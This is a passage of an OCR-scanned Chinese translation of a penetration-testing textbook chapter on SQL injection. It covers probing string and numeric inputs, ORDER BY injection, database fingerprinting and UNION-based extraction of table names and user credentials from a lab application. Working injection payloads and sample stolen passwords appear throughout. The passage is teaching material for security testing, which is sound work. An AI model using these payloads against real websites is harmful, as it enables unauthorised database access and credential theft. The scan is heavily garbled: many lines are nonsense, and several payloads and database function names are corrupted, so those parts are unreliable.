确定 了 应 用 程序 访问 后 端 数据 库 的 各 种 情形 ， 现 在 ， 应 当 在 所 有 这 
些 情形 中 探查 SQL 注入 漏洞 。 实 际 上 ， 提 交 给 服务 器 的 任何 数据 都 
能 够 以 用 户 无 法 察觉 的 方式 传送 给 数据 库 画 数 ， 并 且 可 能 得 到 不 安 


全 的 处 理 。 因 此 ， 需 要 检查 所 有 这 些 数据 ， 以 查找 SQL 注入 漏洞 。 
这 包括 所 有 URL 人 参数 、cookie、POST 数 据 项 以 及 HTTP 消 息 头 。 无 
论 哪 一 种 情况 ， 相 关 参 数 名 称 与 参数 值 的 处 理 过 程 都 可 能 存在 漏 
洞 。 


Y ”提示 在 探查 SQL 注 入 漏洞 时 ,一定 要 确保 完全 遍历 任何 可 
以 提交 专门 设计 的 输入 的 多 阶段 过 程 。 应 用 程序 通常 会 从 儿 个 请 求 


中 收集 一 组 数据 ， 一 旦 收集 到 全 部 的 数据 ， 就 将 其 保存 在 数据 库 
中 。 这 时 ， 如 采 仅 在 每 个 请 求 中 提交 专门 设计 的 数据 并 监控 应 用 程 
序 对 那个 请 求 的 啊 应 ， 束 会 遗漏 许多 SQL 注 入 漏洞 。 


1. 注入 字符 串 数据 
如 有 果 SQL 查 询 合 并 用 户 提 交 的 数据 ， 它 会 将 这 些 数据 包含 在 单 引 
号 中 。 为 利用 任何 SQL 注入 漏洞 ， 攻 击 者 需要 摆脱 这 些 引 瑟 的 束缚 。 


渗透 测试 步骤 


(1) 提交 一 个 单 引 号 作为 目标 查询 的 数据 。 观 察 是 否 会 
错误 ， 或 结 末 是 否 与 原始 结果 不 同 。 如 采 收 到 详细 的 错误 消息 ，6 
查阅 9.2.13 节 了 解 该 消息 的 含义 。 

(2) 如 果 发 现 错误 或 其 他 异常 行为 ， 同 时 提交 两 个 单 引 号 ， 
看 会 出 现 什么 情况 。 数 据 库 使 用 两 个 单 引 号 作为 转 义 序列 ， 表 示 一 
个 原 义 单 引 号 (literal single quote) ， 因 此 这 个 序列 被 解释 成 引用 
字符 串 中 的 数据 ， 而 不 是 结束 字符 串 的 终止 符 。 如 果 这 个 输入 导致 
错误 或 异常 行为 消失 ， 则 应 用 程序 可 能 易于 受 SQL 注 入 攻击 。 

(3) 为 进一步 核实 漏洞 是 否 存在 ， 可 以 使 用 SQL 连 接 符 建 立 一 
个 等 同 于 “ 民 性 ”输入 的 字符 串 。 如 果 应 用 程序 以 与 处 理 对 应 “ 民 
性 ”输入 相同 的 方式 处 理 专门 设计 的 输入 ， 那 么 它 很 可 能 易于 受到 
攻击 。 每 种 数据 库 使 用 的 字符 连接 方法 各 不 相同 。 在 易 受 攻击 的 应 
用 程序 中 ， 可 以 注入 以 下 实例 构建 等 同 于 FOO 的 输入 : 

DOracle ‘FOO 
g MS-SQL: “+ 上 OO 
O MySQL: ‘’FOO [注意 两 个 引号 之 间 有 一 个 空格 ] 


YV 提示 可 以 通过 在 特定 的 参数 中 提交 SQL 通配符 % 来 确定 应 
用 程序 是 否 正 与 后 端 数据 库 交 互 。 例 如 ， 在 搜索 字段 中 提交 这 个 通 
配 符 通常 会 返回 大 量 结 有 末 ， 表 明 输 入 正 被 传送 到 SQL 查询 中 。 妆 
然 ， 这 不 一 定 表示 应 用 程序 易 受 攻击 一 一 只 是 应 该 深入 探查 以 确定 
征 否 存在 任何 具体 的 漏洞 。 


Vv 提示 使 用 单 引号 查找 SQL 注入 漏洞 时 ， 应 特别 注意 浏览 器 
处 理 返 回 的 页 面 时 发 生 的 任何 JavaScript 错 误 。 应 用 程序 经 常 在 


JavaScript 中 返回 用 户 提 区 的 输入 ， 原 义 单 引 号 将 导致 JavaScript 解 释 
器 中 出 现 错误 。 如 第 12 章 所 述 ， 在 啊 应 中 注入 任意 JavaScript 将 导致 
跨 站 点 脚本 攻击 。 


2. 注入 数字 数据 

如 条 SQL 查询 合并 用 户 提交 的 数字 数据 ， 应 用 程序 仍然 会 将 它 包 
含 在 单 引号 之 中 ， 作 为 字符 串 数据 进行 处 理 。 因 此 ， 一 定 要 执行 前 面 
描述 的 针对 字符 串 数 据 的 渗透 测试 步 又 。 但 是 ， 许 多 时 候 ， 应 用 程序 
会 将 数字 数据 以 数字 格式 直接 传送 到 数据 库 中 ， 并 不 把 它 放 入 单 引 号 
中 。 如 有 果 前 面 描述 的 测试 方法 无 法 检测 到 漏洞， 还 可 以 采取 以 下 针对 
数字 数据 的 特殊 测试 步 又 。 


渗透 测试 步骤 


(1) 尝试 输入 一 个 结果 等 于 原始 数字 值 的 简单 数学 表达 式 。 
例如 ， 如 果 原 始 值 为 2， 党 试 提交 1+1 或 3-1。 如 果 应 用 程序 做 出 相 
同 的 啊 应 ， 则 表示 它 易于 受到 攻击 。 

(2) 如 果 证 实 被 修改 的 数据 会 对 应 用 程序 的 行为 造成 明显 影 
啊 ， 则 前 面 摘 述 的 测试 方法 最 为 可 靠 。 例 如 ， 如 果 应 用 程序 使 用 数 
字 化 PageID 参 数 指定 应 返回 什么 内 容 ， 则 用 1+1 代 替 2 得 到 相同 的 结 
果 明 显 表示 存在 SQL 注 入 。 但 是 ， 如 果 能 够 在 数字 化 参数 中 插入 任 
意 输入 ， 但 应 用 程序 的 行为 却 没有 发 生 改变 ， 那 么 前 面 的 检测 方法 
就 无 法 发 现 漏 润 。 

(3) 如 果 第 一 个 测试 方法 取得 成 功 ， 你 可 以 利用 更 加 复杂 
的 、 使 用 特殊 SQL 关键 字 和 语法 的 表达 式 进一步 获得 与 漏洞 有 关 的 
证 据 。ASCII 命 令 职 是 一 个 典型 的 示例 ， 它 返回 被 提交 字符 的 数字 
化 ASCII 代 码 。 例 如 ， 因 为 A 的 ASCII 值 为 6， 在 SQL 中 ， 以 下 表达 
起 等 于 2 


6/7 ASE TL A > 


(4) WRES S eet, BLA BTA ts ERI AE 
用 。 但 是 ， 这 时 可 以 利用 这 样 一 个 事实 : 即 在 必要 时 ， 数 据 库 会 隐 
含 地 将 数字 数据 转化 为 字符 串 数 据 。 例 如 ， 因 为 字符 1 的 ASCII 值 为 
49， 在 SQL 中 ， 以 下 表达 式 等 于 2。 


Vv 提示 在 探查 应 用 程序 是 否 存 在 SQL 注 入 之 类 的 缺陷 时 ， 我 
们 常常 会 犯 一 个 错误 ， 即 忘记 某 些 字符 在 HTTP 请 求 中 具有 特殊 合 
义 。 如 果 你 希望 在 攻击 有 效 载 癸 中 插入 这 些 字 符 ， 必 须 谨慎 地 对 它 


们 进行 URL 编 码 ， 确 保 应 用 程序 按 预 料 的 方式 解释 它们 ， 特 别 是 以 
下 字符 。 

口 & 和 = 用 于 连接 名 / 值 对 ， 建 立 查询 字符 串 和 POST 数据 块 。 应 
当 分 别 使 用 %26 与 %3d 对 它们 进行 编码 。 

口 查询 字符 串 中 不 允许 使 用 空格 ， 如 果 在 其 中 提交 空格 ， 整 个 
字符 串 会 立即 终止 。 必 须 使 用 + 或 %20 对 其 编码 。 

口 由 于 + 用 于 编码 空格 ， 如 果 想 在 字符 串 中 使 用 +， 必 须 使 

用 %2b 对 其 编码 。 因 此 ， 在 前 面 的 数字 化 示例 中 ，1+1 应 以 1%2b1 的 
形式 提交 。 

口 分 号 用 于 分 隔 cookie 字 段 ， 必 须 使 用 %3b 对 其 编码 。 

无 论 是 通过 拦截 代理 服务 器 直接 从 浏览 器 中 编辑 参数 值 ， 或 是 
使 用 其 他 方法 进行 编辑 ， 都 必须 使 用 这 些 编码 方法 。 如 果 没 有 对 相 
人 
TE o 


一 般 来 说 ， 前 面 描 述 的 步骤 足以 确定 绝 大 多 数 的 SQL 注入 漏洞 ， 
包括 许多 向 浏览 器 返回 无 用 结果 或 错误 信息 的 漏洞 。 但 是 ， 在 某 些 情 
况 下 ， 可 能 有 必要 使 用 更 加 高 级 的 技巧 ， 如 时 间 延 迟 ， 来 确定 漏洞 是 
否 存在 。 我 们 将 在 本 章 后 面部 分 描述 这 些 技巧 。 

3. 注入 查询 结构 

如 果 用 户 提 交 的 数据 被 插入 SQL 查询 结构 ， 而 不 是 查询 中 的 数据 
项 中 ， 这 时 实施 SQL 注入 攻击 只 需要 直接 应 用 有 效 的 SQL 语法 ， 而 不 
需要 进行 任何 “ 转 义 ”。 

SQL 查 询 结 构 中 最 常见 的 注入 点 是 ORDER BY 子 句 。ORDER BY 
关键 字 接 受 某 个 列 名 称 或 编号 ， 并 根据 该 列 中 的 值 对 结果 集 进行 排 
序 。 用 户 经 常 使 用 这 种 功能 对 浏览 器 中 的 表 进 行 排 序 。 

例如 ， 使 用 以 下 查询 可 以 检索 一 个 可 排序 的 图 书 表 : 


SELECT author, title, year FROM books WHERE publisher = 'Wiley' ORDER BY 


itle 


如 果 ORDER BY 中 的 列 名 称 title 由 用 户 指定 ， 就 没有 必要 使 用 单 
引号 ， 因 为 用 户 提交 的 数据 已 经 直接 修改 了 SQL 查询 的 结构 。 


Vo ”提示 在 极 少数 情况 下 ， 用 户 提 交 的 输入 可 能 会 指定 
WHERE 子 句 中 的 列 名 称 。 由 于 这 些 输入 也 没有 包含 在 单 引 号 中 ， 


因此 会 导致 与 前 面 介绍 的 漏洞 类 似 的 问题 。 笔 者 也 曾 遇 到 一 些 以 用 
户 提交 的 参数 作为 表 名 称 的 应 用 程序 。 最 终 ， 有 大 量 应 用 程序 允许 
用 户 (ASC 或 DESC) ， 可 能 认为 这 并 不 会 导致 SQL 
注入 攻击 。 


在 列 名 称 中 查找 SQL 注入 漏洞 可 能 会 相当 困难 。 如 采 提 区 一 个 并 
非 有 效 列 名 称 的 值 ， 碍 询 将 导致 错误 。 这 意味 着 ， 无 论 攻击 者 提交 路 
径 遍 历 字符 种、 单 引 号 、 双 引号 或 任何 其 他 任意 字符 串 ， 应 用 程序 都 
会 返回 相同 的 啊 应 。 因 此 ， 采 用 和 音 用 的 目 动 模糊 测 翅 和 手动 测试 技巧 
往往 会 送 漏 某 些 漏洞 。 如 打 提 交 用 于 探查 各 种 漏洞 的 标准 测试 字符 串 
全 部 导致 相同 的 啊 应 ， 这 本 里 并 不 表示 出 现任 何 错误 。 


T BR 本 章 后 面部 分 介绍 的 一 些 传统 的 SQL 注 入 防御 措施 并 


不 能 防范 用 户 提交 的 列 名 称 。 使 用 预 处 理 的 语句 或 转 义 单 引号 也 不 
能 阻止 这 类 SQL 注 入 。 因 此 ， 现 代 应 用 程序 应 尤其 小 心 这 类 攻击 。 


渗透 测试 步骤 


(1) 记 下 任何 可 能 控制 应 用 程序 返回 的 结果 的 顺序 或 其 中 的 
字段 类 型 的 参数 。 

(2) 提供 一 系列 在 参数 值 中 提交 数字 值 的 请 求 ， 从 数字 1 开 
始 ， 然 后 逐个 请 求 递增 。 

口 如 果 更 改 输入 中 的 数字 会 影响 结果 的 顺序 ， 则 说 明和 输入 可 能 
被 插入 到 ORDER BY 子 句 中 。 在 SQL 中 ，ORDER BY 1 将 依据 第 一 
个 列 进行 排序 。 然 后 ， 将 这 个 数字 增加 到 2 将 更 改 数据 的 显示 顺 
序 ， 以 依据 第 二 个 列 进行 排序 。 如 果 提 交 的 数字 大 于 结果 集中 的 列 
数 ， 查 询 将 会 失败 。 在 这 种 情况 下 ， 你 可 以 通过 使 用 以 下 字符 串 ， 
今 查 是 否 可 以 颠倒 结果 的 顺序 ， 从 而 确认 是 否 可 以 注入 其 他 SQL: 


Ase == 
i OSs m- 


口 如 果 提交 数字 1 生成 一 组 结果 ， 其 中 一 个 列 的 每 一 行 都 包含 一 
个 1， 则 说 明 输入 可 能 被 插入 到 查询 返回 的 列 的 名 称 中 。 例 如 ; 


SELECT 1,title,year PROM books WHERE publisher='Wiley' 


T 注解 在 ORDER BY 子 句 中 实施 SQL 注入 与 其 他 注入 情形 有 


很 大 区 别 。 此 时 ， 数 据 库 不 会 接受 查询 中 的 UNION、WHERE、OR 
BYANDKES ° HM, SHEA NHANES TE TREAT 
来 奉 代 参数 ， 如 用 (select 1 where <<condition>> or 1/0=0) 替代 列 

名 称 ， 并 利用 本 音 后 面部 分 介绍 的 推断 技巧 。 对 于 支持 批量 查询 的 
数据 库 (如 MS-SQL) ， 这 可 能 是 最 有 效 的 注入 攻击 方法 。 


9.2.4 “指纹 ” 识 昂 


迄今 为 止 ， 我 们 所 描述 的 大 多 数 技巧 能 够 癌 常 用 的 数据 库 平 台 发 
动 有 效 攻 击 ， 任 何 差别 都 已 通过 对 语法 进行 细微 调整 得 到 解决 。 但 
古 ， 随 着 我 们 开始 分 析 更 高 级 的 利用 技巧 ， 各 种 平台 之 间 的 差异 变 得 
ie 因此 了 解 所 针对 的 是 何 种 类 型 的 后 端 数据 库 就 变 得 印发 重 


我 们 已 经 知道 如 何 提取 常见 数据 麻 的 版 本 字符 串 。 即 使 由 于 某 种 
原因 无 法 提取 到 版 本 信息 ， 我 们 还 是 可 以 使 用 其 他 方法 识别 数据 库 。 
一 种 最 可 靠 的 方法 是 根据 数据 库 连 接 字 符 串 的 不 同方 式 进行 识别 。 在 
控制 某 个 字符 串 数据 项 的 查询 中 ， 可 以 在 一 个 请 求 中 提交 一 个 特殊 的 
值 ， 然 后 测试 各 种 连接 方法 ， 以 生成 那个 字符 串 。 如 果 得 到 相同 的 结 
果 ， 或 可 以 确定 所 使 用 的 数据 库 类 型 。 下 面 的 示例 说 明 常用 的 数据 认 
如 何 构建 services 字 符 串 。 

D Oracle: ‘serv’||‘ices’ 

DMS-SQL: ‘serv’+‘ices’ 

口 MySQL: ‘serv’ ‘ices’ [注意 中 间 有 空格 ] 

如 果 注 入 数字 数据 ， 则 可 以 使 用 下 面 的 攻击 字符 串 来 识别 数据 
We 在 其 他 数据 库 中 则 会 
导致 错误 。 

a Oracle: BITAND(1,1)-BITAND(1,1) 

O MS-SQL: PACK RECEIVED-PACK RECEIVED 

O MySQL: CONNECTION_IDQ-CONNECTION_IDQ 


(EAR MS-SQL 和 Sybase 数据 库 起 源 相 同 ， 因 此 它们 在 表 结 


构 、 全 局 变量 和 存储 过 程 方面 存在 许多 相似 之 处 。 实 际 上 ， 后 文 描 
述 的 绝 大 多 数 针 对 MS-SQL 的 攻击 技巧 同样 也 适用 于 Sybase 。 


在 识别 数据 库 时 ，MySQL 如 何 处 理 某 些 行内 注释 (inline 
comment) 也 是 一 个 值得 关注 的 问题 。 如 果 一 个 注释 以 感叹 号 开头 ， 
接 看 是 数据 库 版 本 字符 串 ， 那 么 只 要 数据 库 的 实际 版 本 等 于 或 高 于 那 
个 衬 符 串 ， 应 用 程序 就 会 将 注释 内 容 解释 为 SQL， 否 则 ， 应 用 程序 就 
会 忽略 注释 内 容 ， 将 它 作 为 注释 处 理 。 与 C 中 的 预 处 理 指令 类 似 ， 程 
序 员 也 可 以 对 这 一 点 加 以 利用 ， 编 写 出 根据 所 使 用 的 数据 库 版 本 进行 


处 理 的 不 同 代 码 。 攻 击 者 还 可 以 利用 它 来 识别 数据 库 的 实际 版 本 。 例 
如 ， 如 果 使 用 的 MySQL 版 本 高 于 或 等 于 3.23.02， 注 入 下 面 的 字符 串 将 
使 SELECT 语句 的 WHERE 子 句 为 假 : 


/323U2 and d=0*7 


9.2.5 UNION 操作 符 


SQL 使 用 UNION 操 作 符 将 两 个 或 几 个 SELECT 语句 的 结果 组 合 到 
独立 一 个 结果 中 。 如 果 一 个 Web 应 用 程序 的 SELECT 语句 存在 SQL 注入 
漏洞 ， 通 常 可 以 使 用 UNION 操 作 符 执行 男 一 次 完全 独立 的 查询 ， 并 将 
它 的 结果 与 第 一 次 查询 的 结果 组 合 在 一 起 。 如 果 应 用 程序 向 浏览 器 返 
回 查 询 结 果 ， 那 么 束 可 以 使 用 这 种 技巧 从 应 用 程序 中 提取 任意 的 数 
据 。 所 有 的 主流 DBMS 产 品 者 支持 UNION， 对 于 直接 返回 查询 结果 的 
情况 ，UNION 是 检索 信息 最 快捷 的 方式 。 

我 们 再 回 到 那个 允许 用 户 根 据 作者 、 书 名 、 出 版 两 和 其 他 条 件 搜 
-a 。 搜索 由 Wiley 出 版 的 书籍 将 引起 应 用 程序 执行 以 
下 查询 


SELECT author,title,year FROM books WHERE publisher = 'Wiley' 


假设 这 个 查询 返回 下 面 这 组 结果 : 


作 者 书 名 出 版 年 份 
Litchfield The Database Hackers Handbook 2005 
Anley The Shellcoder's Handbook 2007 


BUSCAR ZA TS a UU tT FS BEES ITAA ` 
破坏 查询 中 的 WHERE 子 句 、 返 回 数据 库 中 保存 的 所 有 书籍 的 。 一 个 
更 有 趣 的 攻击 是 使 用 UNION 操 作 符 注入 另外 一 个 SELECT 查询 ， 并 将 
查询 结果 附加 在 第 一 次 查询 的 结果 之 后 。 第 二 次 查询 能 够 从 另 一 个 完 
全 不 同 的 数据 库 表 中 提取 数据 。 例 如 ， 输 入 以 下 搜索 项 : 


Wiley' UNION SELECT username, PasSsworQ, uid FROM users-- 


应 用 程序 将 执行 以 下 查询 : 


SELECT author, title,year FROM books WHERE publisher = 'Wiley' 


UNION SELECT username,password,uid FROM users--' 


这 个 查询 返回 最 初 的 搜索 结果 ， 接 着 是 用 户 表 的 内 容 : 


作 者 书 名 出 版 年 份 
Litchfield The Database Hacker's Handbook 2005 
Anley The Shellcoder's Handbook 2007 
admin r00trOx 0 
cliff Reboot 1 


TÒ 注解 ”如果 使 用 NION 操 作 符 组 合 两 个 或 几 个 SELECT 查询 
的 结果 ， 那 么 组 合 结果 的 列 名 称 与 第 一 个 SELECT 查询 的 列 名 称 完 


全 相同 。 如 前 面 的 表格 所 示 ， 用 户 名 出 现在 author 列 中 ， 密 码 出 现 
在 title 列 中 。 这 表示 应 用 程序 在 处 理 被 修改 的 查询 结果 时 ， 它 无 法 
仿 测 出 返回 的 数据 实际 上 来 目 一 个 完全 不 同 的 表 。 


这 个 简单 的 示例 说 明 ，UNION 操 作 符 可 在 SQL 注入 攻击 中 发 挥 非 
党 巨大 的 作用 。 但 是 ， 在 利用 它 发 动 攻 击 之 前 ， 攻 击 者 有 必要 了 解 它 
的 两 个 重要 限制 。 

口 如 有 果 使 用 UNION 操 作 符 组 合 两 个 查询 的 结果 ， 这 两 个 结 采 必须 
结构 相同 。 也 就 是 说 ， 它 们 的 列 数 必须 相同 ， 必 须 使 用 按 相 同 顺序 出 
现 的 相同 或 兼容 的 数据 类 型 。 

口 为 注入 为 一 个 返回 有 用 结案 的 查询 ， 攻 击 者 必须 知道 他 所 针对 
的 数据 库 表 的 名 称 以 及 有 关 列 的 名 称 。 

现在 让 我 们 更 加 深入 地 分 析 前 一 个 限制 。 假 设 攻击 者 试图 注入 另 
一 个 返回 错误 列 数 的 查询 。 他 提交 以 下 输入 : 


Wiley' UNION SELECT username,password FROM users 


最 初 的 查询 返回 3 列 ， 而 注入 的 查询 返回 2 列 。 因 此 ， 数 据 库 返 回 
以 下 错误 : 

ORA-01789: query block has incorrect number of result columns 

假设 攻击 者 试图 注入 另 一 个 列 内 数据 类 型 不 兼容 的 查询 。 他 提交 
以 下 输入 : 

Wiley' UNTON SELECT uid,username,password FROM users-- 

这 样 ， 数 据 库 将 尝试 把 第 二 个 查询 的 密码 列 《其 中 为 字符 串 数 
据 ) 与 第 一 个 查询 的 年 代 列 (其 中 为 数字 数据 ) 组 合 起 来 。 因 为 字符 
串 数 据 无 法 转换 为 数字 数据 ， 这 个 语句 造成 一 个 错误 : 


ve same datatype as corresponding expression 


A-01790: expression must ha 


THF 上 面 是 Oracle 返 回 的 错误 消息 。 其 他 数据 库 返 回 的 相 


应 错误 消息 请 参阅 9.2.13 节 。 


在 许多 现实 例子 中 ， 数 据 库 返 回 的 错误 消息 将 被 应 用 程序 截获 ， 
并 不 显示 在 用 户 的 浏览 器 上 。 因 此 ， 如 果 想 要 查 明 第 一 个 查询 的 结 
构 ， 也 许 只 能 纯粹 靠 猜测 。 但 是 ， 事 实 并 非 如 此 。 可 以 利用 以 下 三 点 
帮助 简化 这 项 任务 。 

口 为 使 注入 的 查询 能 够 与 第 一 个 查询 结合 ， 它 不 一 定 要 使 用 完全 
相同 的 数据 类 型 。 但 是 ， 它 们 必须 相互 兼容 ， 也 就 是 说 ， 第 二 个 查询 
中 的 每 种 数据 类 型 要 入 必须 与 第 一 个 查询 中 的 对 应 类 型 完全 相同 ， 要 
么 必须 隐 含 地 转换 到 那个 类 型 。 数 据 库 会 将 一 个 数字 值 隐 含 地 转换 为 
一 个 字符 串 值 。 实 际 上 ，NULL 值 可 被 转换 成 任何 数据 类 型 。 因 此 ， 
如 果 不 知 道 某 个 特殊 字段 的 数据 类 型 ， 只 需 在 那个 字段 输入 SELECT 
NULL 即 可 ° 

口 如 果 数 据 库 返 回 的 错误 消息 被 应 用 程序 截获 ， 还 是 可 以 轻易 确 
定 注入 的 查询 是 否 得 以 执行 。 因 此 ， 如 果 查 询 已 经 执行 ， 那 么 应 用 程 
序 第 一 个 查询 返回 的 结果 后 面 会 增加 其 他 结果 。 可 以 据 此 进行 系统 的 
推测 ， 直 到 查 明 需要 注入 的 查询 结构 。 


口 许多 时 候 ， 只 需 在 第 一 个 得 询 中 确定 一 个 使 用 字符 串 数据 类 型 
的 字段 束 可 以 达到 目 己 的 目的 。 这 足以 允许 注入 任意 返回 字符 串 数 据 
的 查询 并 获得 其 结果 ， 帮 助 系统 性 地 从 数据 库 中 提取 任何 想 要 的 数 
据 。 


渗透 测试 步骤 


攻击 的 首要 任务 是 查 明 应 用 程序 执行 的 最 初 得 询 所 返回 的 列 
数 。 有 两 种 方法 可 以 完成 这 项 任务 。 

(1) 可 以 利用 NULL 被 转换 为 任何 数据 类 型 这 一 事实 ， 系 统 性 
地 注入 包含 不 同 列 数 的 得 询 ， 直 到 注入 的 碍 询 得 到 执行 ， 例 如 

‘UNION SELECT NULL-- 

‘UNION SELECT NULL, NULL-- 

‘UNION SELECT NULL, NULL, NULL-- 

Ete) tr BU UT BA tA IE ASB e WRH PE A E] 
数据 库 错 误 消 息 ， 仍 然 可 以 了 解 注入 的 查询 是 否 成 功 执行 ， 因 为 会 
收 到 另外 一 行 数 据 ， 其 中 包含 NULL 或 一 个 空 字符 串 。 注 意 ， 注 入 
行 可 能 只 包含 空 单 元 格 ， 因 此 不 容易 得 知 何 时 以 HTML 提 交 。 出 于 
这 个 原因 ， 进 行 攻击 的 最 好 是 查看 行 啊 应 。 

(2) 确定 所 需 的 列 数 后 ， 下 一 项 任务 惑 是 找到 一 个 使 用 字符 
串 数 据 类 型 的 列 ， 以 便 通 过 它 从 数据 库 中 提取 出 任意 数据 。 和 前 面 
一 样 ， 可 以 通过 注入 一 个 包含 NULL 值 的 查询 ， 并 系统 性 地 用 a 代替 
每 个 NULL， 从 而 完成 这 项 任务 。 例 如 ， 如 采 知 道 查询 必须 返回 3 
列 ， 可 以 注入 以 下 查询 : 

‘UNION SELECT ‘a’, NULL, NULL-- 

‘UNION SELECT NULL, ‘a’, NULL-- 

‘UNION SELECT NULL, NULL, ‘a’-- 

如 有 果 注 入 的 查询 得 到 执行 ， 将 看 到 另 一 行 包含 a 值 的 数据 ， 然 
后 束 可 以 使 用 相关 列 从 数据 库 中 提取 数据 。 


T 注解 在 Oracle 数 据 库 中 ， 每 个 SELECT 语句 必须 包含 一 个 


FROM 属性 ， 因 此 ， 无 论 列 数 是 否 正确 ,注入 UNION SELECT 
NULL 将 产生 一 个 错误 。 可 以 选择 使 用 全 局 可 访问 表 (globally 
accessible table) DUAL 来 满足 这 一 要 求 。 例 如 : 

< UNION SELECT NULL FROM DUAL-- 


如 果 已 经 确定 注入 的 查询 所 需 的 列 数 ， 并 且 已 经 找到 一 个 使 用 字 
符 串 数据 类 型 的 列 ， 就 能 够 提取 出 任意 数据 。 一 个 简单 的 概念 验证 测 
试 是 提取 数据 库 的 版 本 字符 串 ， 可 以 对 任何 数据 库 管 理 系统 
(DBMS) 进行 测试 。 例 如 ， 如 果 查 询 一 共有 3 列 ， 第 一 列 可 以 提取 字 
符 串 数据 ， 可 以 在 MS-SQL 和 MySQL 中 注入 以 下 查询 提取 数据 库 版 
本 : 


' UNION SELECT @@version, NULL, NULL-- 


对 Oracle 注 入 以 下 查询 将 得 到 相同 的 结果 : 
' UNION SELECT banner,NULL,NULL FROM vSversion-- 


在 前 面 介 绍 的 易 受 攻击 的 图 书 搜索 应 用 程序 中 ， 可 以 使 用 这 个 字 

符 串 作为 搜索 项 来 获得 Oracle 数据 库 的 版 本 : 
书 出 版 年 
作 者 名 份 

CORE 9.2.0.1.0 Production 
NLSRTL Version 9.2.0.1.0 - Production 
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 
Production 
PL/SQL Release 9.2.0.1.0 - Production 


TNS for 32-bit Windows: Version 9.2.0.1.0 - 
Production 


当然 ， BARENE FR RERNE, HE) BGS ae 
殊 软 件 中 的 漏洞 ， 但 是 ， 在 多 数 情况 下 ， 我 们 仍然 对 从 数据 库 中 提取 
数据 更 感 兴 趣 。 要 做 到 这 一 点 ， 渗 透 测试 员 需 要 解除 前 面 描述 的 第 二 
个 限制 ， 也 就 是 说 ， 需 要 知道 想 要 攻击 的 数据 库 表 的 名 称 以 及 相关 列 
的 名 称 。 


9.2.6 FAR 


为 了 从 数据 库 中 提取 有 用 的 数据 ， 通 常 需 要 了 人 解 表 以 及 包含 预 访 
问 的 数据 所 属 列 的 名 称 。 大 型 企业 DBMS 中 包含 大 量 数据 库 元 数据 ， 
可 以 查询 这 些 数 据 查 明 数 据 库 中 每 一 个 表 和 列 的 名 称 。 在 各 种 情况 
下 ， 提 到 有 用 数据 所 使 用 的 方法 完全 相同 ;但 是 ， 在 不 同 数据 库 乎 台 
上 的 应 用 细 市 各 不 相同 。 


9.2.7 ”使 用 UNION 提 取 数 据 


下 面 我 们 将 分 析 一 个 攻击 ， 虽 然 该 攻击 针对 的 是 MS-SQL 数 据 
库 ， 但 它 采 用 的 攻击 方法 适用 于 所 有 数据 库 技 术 。 以 用 户 维护 联系 人 
列表 及 查询 和 更 新 联系 人 信息 的 通讯 录 应 用 程序 为 例 。 如 果 用 户 在 通 
讯 未 中 搜索 名 为 Matthew 的 联系 人 ， 浏 览 磊 将 提交 以 下 参数 : 


Name=Matthew 


应 用 程序 将 返回 以 下 结 采 : 


人 名 电子 邮件 地 址 


Matthew Adamson handytrick@ gmail.com 


尝试 访问 


http://mdsec.net/addressbook/32/ 


BI, Fe eee RA Bo I—II ET OS BL A F 


He 
BLY A: 
Name=Matthew' $20unicn$20select$20null-- 


All queries combined using a UNION, INTERSECT or EXCEPT operator must 


Ta LOr mase 


have an equal number of expressions in their target list 


Sts. 


我 们 添加 男 一 个 NULL， 并 得 到 同样 的 错误 。 于 是 我 们 继续 添加 
NULL， 直 到 查询 被 执行 ， 并 在 结果 表 中 生成 男 一 个 数据 项 ， 如 下 所 
ZN: 


Name=Matthew'! &20union%20select%20null,null,null,null,null 


人 名 电子 邮件 地 址 


Matthew Adamson handytrick@gmail.com 


[5] [2] 


ENED UE WEI EREA FIT BH 


Name-Matthew'%20union%20select%20'a',nuli,null,null,null 


人 名 电子 邮件 地 址 
Matthew Adamson handytrick@ gmail.com 
[a] 


接 下 来 ， 需 要 查 明 可 能 包含 有 用 信息 的 数据 库 表 和 列 的 名 称 。 为 
此 ， 我 们 需要 查询 元 数据 表 information schema.columns， 其 中 包含 数 
据 库 中 的 所 有 表 和 列 名称 的 详细 资料 。 使 用 以 下 请 求 可 以 检索 上 壕 信 


Ja: 
Name=Matthew'$20unions$20select%20table name, ccolumn_name,null,null, 
nul1%20from%20information_schema.columns 
人 名 电子 邮件 地 址 
Matthew Adamson handytrick@ gmail.com 
shop_items Price 
shop_items Prodid 
shop_items Prodname 
addr_book Contactemail 
addr_book Contactname 
Users Username 
Users Password 


从 以 上 结果 可 以 确定 ， 很 明显 ， 我 们 可 以 从 用 户 表 开始 提取 数 
据 。 这 时 使 用 以 下 查询 : 


Name=Matthew ' $S20UNION%20select%20username, password, null,null,nmuli$20 
rom$20users-- 
人 名 电子 邮件 地 址 
Matthew Adamson handytrick@ gmail.com 
administrator fme69 
dev uber 
marcus 8pinto 
smith twosixty 


jlo 6kdown 


v 提示 MS-SQL、MySQL 和 许多 其 他 数据 库 (包括 SQLite 
和 Postgresql) 均 支 持 information_schema。 它 主要 用 于 保存 数据 库 元 
数据 ， 这 也 使 它 成 为 探查 数据 库 的 攻击 者 的 主要 目标 。 需 要 注意 的 
是 ，Oracle 并 不 文 持 该 方案 。 对 Oracle 数 据 库 实 施 攻 击 时 ， 攻 击 方法 
在 其 他 各 方面 可 能 完全 相同 。 但 是 ， 需 要 使 用 查询 
SELECTtable_name,column_name FROM all_tab_columns 来 检索 有 天 
数据 库 表 和 列 的 信息 。 (使 用 user_tab_columns 表 以 仅 针 对 当前 数据 
库 。) 通常 ， 在 分 析 大 型 数据 库 以 探查 攻击 目标 时 ， 最 好 是 查找 有 
用 的 列 名 称 ， 而 不 是 表 。 例 如 : 


LIAN 6 ) il 


YY 提示 如 果 目 标 表 返 回 了 多 个 列 ， 则 可 以 将 这 些 列 串 连 到 
单独 一 个 列 中 ， 这 样 检索 起 来 会 更 加 方便 ， 因 为 这 时 只 需要 在 原始 
查询 中 确定 一 个 varchar 字 上 段 : 

g Oracle: SELECT table_name||’:’||column_name FROM 
all_tab_columns 

O MS-SQL: SELECT table_name+’:’+column_name from 
information_schema.columns 

O MySQL: SELECT CONCAT(table_name,’:’,column_name) 
from information_schema.columns 


9.2.8 FTW 


ART, ASCSQL 注入 攻击 的 应 用 程序 可 能 会 执行 各 种 输入 过 滤 以 
防止 攻击 者 无 限制 地 利用 其 中 存在 的 缺陷 。 例 如 ， 应 用 程序 可 能 会 删 
除 或 净化 某 些 字符 ， 或 阻止 常用 的 SQL 关键 字 。 这 种 过 滤 通 种 非常 容 
